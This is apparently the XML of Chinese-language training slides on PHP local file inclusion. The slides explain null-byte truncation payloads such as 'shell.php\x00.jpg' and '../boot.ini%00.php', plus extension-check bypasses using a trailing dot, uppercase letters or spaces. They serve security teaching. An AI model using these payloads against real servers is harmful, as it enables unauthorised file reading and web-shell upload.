          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实验步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2636520" y="3731260"/>
            <a:ext cx="5704840" cy="3043555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420620" y="5742940"/>
            <a:ext cx="1816100" cy="52006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8017510" y="5894705"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输出了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直接箭头连接符 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4342765" y="6009005"/>
            <a:ext cx="3674745" cy="69850"/>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LFI-1-include</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61975" y="1786890"/>
            <a:ext cx="10984230" cy="4157980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>语句会将包含的文件当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>代码来执行。无论文件的扩展名是什么，只要文件中的内容是有效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>代码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>都会解析并执行这些代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>如果文件不包含有效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>代码（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>、文本文件等），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>会按照文件内容的原样输出。即使文件扩展名不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>，只要文件中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>&lt;?php ... ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>代码块，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>会执行这些代码块。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>总的来讲：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>、include会将文件内容当作PHP代码来解析。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>、文件的扩展名并不影响PHP的解析方式，只要文件内容符合PHP的语法规范，PHP就会执行其中的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>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其他利用方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>截断</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330200" y="1296670"/>
            <a:ext cx="11234420" cy="5323205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>在PHP中，“00截断”通常与文件包含（如include或require）相关，尤其是在处理动态文件包含时可能存在安全隐患。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>00截断（Null Byte Truncation）是一种利用Web应用程序对上传文件处理不当的技巧，尤其是在处理文件名或文件内容时。00截断依赖于某些编程语言或系统在遇到ASCII null字节（\x00）时的行为，即终止字符串解析或文件处理。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    文件名截断：上传文件时，在文件名中插入一个null字节，可能导致服务器在null字节处截断文件名，忽略null字节后的部分。这可以用来绕过基于文件名的过滤或检查。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    文件内容截断：在文件内容中插入null字节，可能导致文件内容在null字节处被截断，这可以用来隐藏或插入恶意内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>文件名：Web应用只允许上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>文件，通过在文件名中使用null字节，攻击者可以上传一个文件，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php\x00.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>。上传时只看到.jpg扩展名，允许上传，解析时解析成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>文件内容：Web应用在处理文件内容时遇到null字节就停止读取，攻击者可以在合法文件内容后插入null字节，然后跟上恶意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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2926080" cy="922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文件包含</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LFI-2-00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截断</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487680" y="1245870"/>
            <a:ext cx="8641080" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般下载都会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>失败</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问：https://windows.php.net/downloads/releases/archives/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487680" y="2486025"/>
            <a:ext cx="8092440" cy="2758440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="561975" y="5589270"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>include/+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/+.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466725" y="5953760"/>
            <a:ext cx="9989820" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果我想执行一个非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件呢？比如一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，那么就使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>../../boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，然后再用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>吧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>inlcude/../boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00.php                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或者直接访问目录下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件，只是不加扩展名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5661025" y="1245553"/>
            <a:ext cx="5080000" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>PHP 5.3.29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>及其之前的版本存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>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结尾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LFI-3</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33375" y="1241425"/>
            <a:ext cx="10930255" cy="4200525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333375" y="5544185"/>
            <a:ext cx="10616565" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>要访问目录中结尾是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的文件时候，系统会判断你传入的文件名结尾，如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件，那么就不会让你进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件内容获取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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点和斜线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LFI-3</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097915" y="1960245"/>
            <a:ext cx="9725025" cy="2984500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件后缀名加点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>php.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PHP的file_get_contents()函数会根据传入的路径读取文件内容。在文件系统中，实际文件的扩展名是.php，但由于传入的字符串包含额外的.，PHP仍然会解析并试图读取实际的phpinfo.php文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>文件系统通常会将phpinfo.php.视为一个有效的文件名，但在字符串比较时，检查仍然基于传入的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>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LFI-3-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大小写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</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944880" y="1977390"/>
            <a:ext cx="10285730" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于上面这种还有没有其他方法可以进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这里进行字符串比较就有漏洞，我们可以把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中任意一个或多个换成大写，这样进行判断的时候就能够</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如我要查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpinfo.php     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就可以写成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpinfo.Php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从而逃过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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LFI-3-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>空格绕过</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76630" y="2912745"/>
            <a:ext cx="9956800" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>比如我要查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>phpinfo.php     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就可以写成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>phpinfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从而逃过检查，绿色地方是空格，的判断的时候就可以绕过后缀名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检查了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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LFI-4</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69595" y="1415415"/>
            <a:ext cx="10738485" cy="3623945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604520" y="5292090"/>
            <a:ext cx="4064000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
